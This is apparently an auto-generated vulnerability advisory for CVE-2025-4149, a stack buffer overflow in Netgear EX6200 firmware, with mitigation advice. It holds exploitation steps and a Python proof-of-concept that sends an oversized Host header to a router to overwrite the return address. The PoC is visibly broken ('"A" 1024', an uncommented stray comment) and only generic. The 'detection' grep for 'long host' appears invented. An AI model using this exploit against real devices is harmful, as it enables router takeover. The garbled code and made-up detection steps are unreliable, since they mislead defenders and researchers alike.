Netgear EX6200, Buffer Overflow, CVE-2025-4149 (Critical)

Listen to this Post

How the CVE Works

CVE-2025-4149 is a critical buffer overflow vulnerability in Netgear EX6200 firmware version 1.0.3.94. The flaw resides in the `sub_54014` function, where improper bounds checking on the `host` argument allows an attacker to overwrite adjacent memory regions. By sending a crafted network request with an excessively long `host` parameter, an attacker can trigger a stack-based buffer overflow, potentially leading to remote code execution (RCE). The vendor was notified but did not respond, leaving devices unpatched.

DailyCVE Form

Platform: Netgear EX6200
Version: 1.0.3.94
Vulnerability: Buffer Overflow
Severity: Critical
Date: 05/19/2025

What Undercode Say:

Exploitation:

  1. Craft a malicious payload exceeding the buffer limit for the `host` parameter.
  2. Send the payload via HTTP/UPnP to the target device.
  3. Overwrite the return address to hijack execution flow.

Proof of Concept (PoC) Code:

import socket
target_ip = "192.168.1.1"
target_port = 80
payload = "A" 1024 + "\x41\x42\x43\x44" Overflow + EIP overwrite
request = f"GET / HTTP/1.1\r\nHost: {payload}\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(request.encode())
s.close()

Mitigation:

1. Disable remote administration.

2. Block UPnP on network firewalls.

3. Await firmware update from Netgear.

Detection Commands:

Check device firmware version:
curl -s http://192.168.1.1/setup.cgi | grep "EX6200"
Monitor logs for overflow attempts:
grep "long host" /var/log/messages

Analytics:

  • Attack Vector: Remote, low complexity.
  • Impact: Full device compromise.
  • Patch Status: Unavailable.
  • Workaround: Network segmentation.
